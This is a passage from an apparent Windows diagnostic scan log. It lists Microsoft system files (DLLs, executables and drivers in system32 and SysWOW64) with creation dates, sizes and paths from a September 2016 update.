2016-09-30 06:31 - 2016-09-15 18:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2016-09-30 06:31 - 2016-09-15 18:42 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys
2016-09-30 06:31 - 2016-09-15 18:41 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 02254848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00711168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-09-30 06:31 - 2016-09-15 18:38 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-09-30 06:31 - 2016-09-15 18:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-09-30 06:31 - 2016-09-15 18:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2016-09-30 06:31 - 2016-09-15 18:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-09-30 06:31 - 2016-09-15 18:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 09129984 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-09-30 06:31 - 2016-09-15 18:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2016-09-30 06:31 - 2016-09-15 18:28 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2016-09-30 06:31 - 2016-09-15 18:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe
2016-09-30 06:31 - 2016-09-15 18:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-09-30 06:31 - 2016-09-15 18:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2016-09-30 06:31 - 2016-09-15 18:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 08122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-09-30 06:31 - 2016-09-15 18:20 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-09-30 06:31 - 2016-09-15 18:20 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02668544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00832512 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-09-30 06:31 - 2016-09-15 18:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
